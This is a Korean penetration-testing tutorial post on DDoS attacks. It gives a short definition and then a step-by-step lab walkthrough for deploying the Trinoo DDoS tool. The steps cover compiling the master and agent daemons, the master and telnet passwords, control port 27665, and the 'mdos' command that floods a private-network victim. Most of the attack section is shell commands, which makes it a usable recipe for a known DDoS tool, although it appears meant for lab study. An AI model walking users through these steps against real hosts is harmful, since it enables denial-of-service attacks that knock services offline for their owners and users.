[ 모의해킹 ] DDos(Distribute Denial of Service) 공격

DDoS(Distribute Denial of Service) 공격

. 서비스 거부 공격은 시스템을 악의적으로 공격해 해당 시스템의 자원을 부족하게 하여 원래 의도된 용도로 사용하지 못하게 하는 공격이다.

. 여러 대의 공격자를 분산 배치하여 특정 서버에게 동시에 엄청난 접속 시도를 만들어 시스템이 더 이상 정상적 서비스를 제공할 수 없도록 만든다.

 

Step 1. Master(192.168.10.1)
#cd /tmp

#tar xvf trinoo.tar

#cat password

#cd master
#make

. 마스터 서버를 실행할 때 패스워드 : gOrave
. 공격을 위해 텔넷에 접속할 때의 포트 번호 : 27665
. 텔넷암호 : betaalmostdone

 

Step 2. Agent(192.168.10.2/192.168.10.3)

#cd /tmp
#tar xvf trinoo.tar
#cd daemon
#vi ns.c

#mv ns.c ../master/
#cd ../master
#vi Makefile

#make
#./daemon           => daemon 실행
#ps -ax | grep daemon

 

Step 3. Master(192.168.10.1)

#cd /tmp/master
#./master

telnet 접속

※ bcast 실행시 "192.168.10.2 / 192.168.10.3" Listing 되지 않으면

스텝1. [Agent]에서 아래 명령어를 다시 실행한다.
#ps -ax | grep daemon #kill -9 "./daemon의 PID"
#cd master #./daemon

스텝2. trinoo에서 아래 명령어 다시 실행한다

. trinoo> mdos 192.168.10.4

. trinoo> bcast

Step 4. Agent(공격후)

Step 5. Victim(공격후)

master의 IP주소는 확인할 수 없으며, Agent 와 Victim의 IP주소만 확인 가능하다.